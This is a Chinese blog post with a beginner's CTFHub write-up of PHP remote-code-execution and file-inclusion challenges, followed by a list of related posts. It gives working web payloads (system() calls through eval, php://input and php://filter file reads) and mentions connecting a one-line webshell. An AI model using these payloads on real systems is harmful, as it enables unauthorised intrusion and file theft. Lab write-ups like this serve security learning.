CTFHub笔记之技能树RCE:eval执行、文件包含、远程包含、php://input、读取源代码

最新推荐文章于 2025-04-15 22:14:46 发布
最新推荐文章于 2025-04-15 22:14:46 发布
阅读量5k 收藏 39
点赞数 8
分类专栏: CTF RCE 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123724483
版权

小白一个,记录解题过程,如有错误请指正!

一、eval执行

知识点:

        eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是非常危险的,因为它允许执行任意 PHP 代码。它这样用是很危险的。如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。


1.用ls查看当前目录,没有发现什么

?cmd=system("ls");

        system():执行系统命令并输出执行结果

2.查看根目录,发现了flag

?cmd=system("ls%20/");

3.读取flag_26396内容即可

?cmd=system("cat%20/flag_26396"); 

二、文件包含

1.题目给了一个shell,点击之后发现是一句话木马

考点:include

解释:假如在index.php中include了一个文件,那么不管这个文件后缀是什么 这个文件中的内容将会直接出现在index.php中。

思路:只要我们把shell.txt的一句话木马内容传到index.php,就可以用蚁剑连接。

padload:

?file=shell.txt

 2.在根目录最下面找到flag

 或者 打开终端  cat /flag

三、php://input

        进来发现又是一段源码,大概意思是必须要php://+payload,看到这会想到php://input和php://filter,不过根据题目可以知道这题要用php://input伪协议

 不过还是进入phpinfo看一下allow_url_include是否打开,发现没有问题

 1.使用burp进行改包

 2.修改payload后发送,发现什么都没有

3.去根目录看一下,发现flag

4.拿到flag

四、远程包含

发现php://input还可以使用,解题方式与上题相同。

五、读取源代码

1.进来发现题目直接给出flag的位置了,用之前的php://input伪协议burp改包发现不管用了,应该是allow_url_include:off 了(默认off,on状态php://input伪协议才可以使用)。

2.我们可以用php://filter实现对文件的访问

?file=php://filter/resource=/flag

 

3.还可以用下面的payload实现flag以base64加密形式输出:

?file=php://filter/read=convert.base64-encode/resource=/flag

 

 

参考文章:

https://blog.csdn.net/weixin_50464560/article/details/117385343

https://blog.csdn.net/m0_52432374/article/details/115186285

https://www.cnblogs.com/linuxsec/articles/12684259.html

网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 993
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
攻防世界-web高手进阶区
zji
04-25 6936
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
CTFhub(eval执行,无过滤,过滤cat,过滤空格,过滤运算符)
ndjnddjxn的博客
04-02 1099
未发现什么,返回上一级目录?
CTFHUB-技能树-Web题-RCE远程代码执行)-eval执行
Static______的博客
05-09 697
CTFHUB-技能树-Web题-RCE远程代码执行
CTF--eval
最新发布
2401_83809941的博客
04-15 199
【代码】CTF--eval
ctfhub-eval执行
m0_52432374的博客
03-24 2070
ctfhub-eval执行 打开题目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1683
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
ctfhub eval执行
a666666688的博客
08-05 459
大致意思是判断用户是否传入了一个cmd,否则执行else。函数会将传入的字符串当作 PHP 代码来执行。中的数据)传递了名为。函数来执行该参数的值。
攻防世界 webj进阶
舞动的獾
08-01 1935
cat 攻防世界cat 原理: php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符...
[CTFHub]eval执行
m0_68956519的博客
11-08 255
但不知道如何使用它,网上搜查wp后发现可以用antsowrd链接,将网址复制下来后输入连接密码cmd,即可链接。打开后会发现一个flag文件,即可找到flag。(环境摧毁后无法连接)由于没有学过php,用ai查看代码。打开网页,会发现如下php代码。
CTFHub | 远程包含
尼泊罗河伯的博客
06-13 2814
远程文件包含(Remote File Inclusion,简称RFI)是一种常见的安全漏洞,它可以允许攻击者远程执行恶意代码或获取敏感信息。攻击者可以通过利用应用程序中易受攻击的包含程序来引入远程文件,这些文件通常包含恶意代码或其他危险的操作。如果应用程序没有正确处理和验证用户输入,那么攻击者就可以通过注入恶意代码来利用这个漏洞。
ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 4267
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开题目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
CTFHUB-技能树-Web题-RCE远程代码执行)-文件包含远程包含
Static______的博客
06-28 508
还记得strpos函数吗,这段代码意思就是判断输入是否有flag字段,PHPinfo当中也表明php://input可以用。那么,利用php://input来寻找flag。没有flag,继续,查看上一级目录。没有flag,查看上一级目录。如果有就输出hacker。没有就进行include。bp抓包,url中输入。还是没有,继续往上查看。也可以直接查看根目录,
substr(php函数)
zunguitiancheng的专栏
03-31 556
http://baike.baidu.com/subview/1827482/5080396.htm                1.定义和用法              2.语法 3.参数 1.定义和用法编辑 substr() 函数返回字符串的一部分。 如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 2.语法编辑
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3900
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1070
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHubRCEeval执行
cx_sam的博客
08-07 1122
CTFHub RCE eval执行
CTFHUB——RCEeval执行文件包含漏洞
m0_46467017的博客
08-31 6387
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
ctfhub技能树rce 文件包含
01-07
### CTFHub 技能树中的 RCE文件包含漏洞 #### 关于远程代码执行 (RCE) 在Web应用程序开发过程中,如果开发者未能正确过滤用户输入的数据就将其用于构建命令字符串,则可能导致远程代码执行(RCE)漏洞。例如,在某些情况下,`shell_exec()` 函数被用来执行系统级别的指令而未对传入参数进行适当的安全检查[^4]。 ```php $result .= shell_exec('ping ' . $ip); // 用户提供的 IP 地址可能携带恶意负载 ``` 这种做法非常危险,因为它允许攻击者注入额外的命令来操纵服务器端的行为。为了防止这种情况发生,应当始终确保所有来自用户的输入都经过严格的验证和清理过程后再使用。 #### 文件包含漏洞概述 文件包含漏洞分为两种主要形式:本地文件包含(LFI)与远程文件包含(RFI),其中LFI更为常见。当应用允许动态加载文件时(比如通过URL参数指定要显示哪个页面),并且这些请求缺乏足够的访问控制机制的话,那么就可能存在这样的风险——即攻击者能够利用该功能读取敏感信息甚至运行任意脚本[^1]。 对于PHP环境而言,内置函数如 `include()` 或者 `require_once()` 都可用于引入其他文件的内容到当前文档流中去。然而一旦程序逻辑设计不当,使得外部可控变量可以直接影响所载入的具体位置,就会形成安全隐患: ```php //安全的做法 if(isset($_GET['file'])) { include $_GET['file']; // 攻击者可以通过修改 URL 参数 file 来尝试加载不同类型的文件 } ``` 上述例子展示了如何不当地依赖未经审查的 GET 请求参数来进行文件操作,这很容易成为 LFI 的入口点[^2]。 #### 安全建议 为了避免遭受因 RCE文件包含缺陷带来的威胁,应该遵循以下几点最佳实践: - 对所有的用户提交数据实施强有力的输入校验; - 使用白名单策略限定可接受的操作范围; - 尽量减少对外部源码片段直接解释的需求,转而在必要场合下采用更稳妥的方式实现相同目的; - 警惕像 eval() 这样的高危特性,除非绝对必需否则应避免使用它们,并且即使要用也需格外小心地管理传递给它的每一个字符[^3];
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值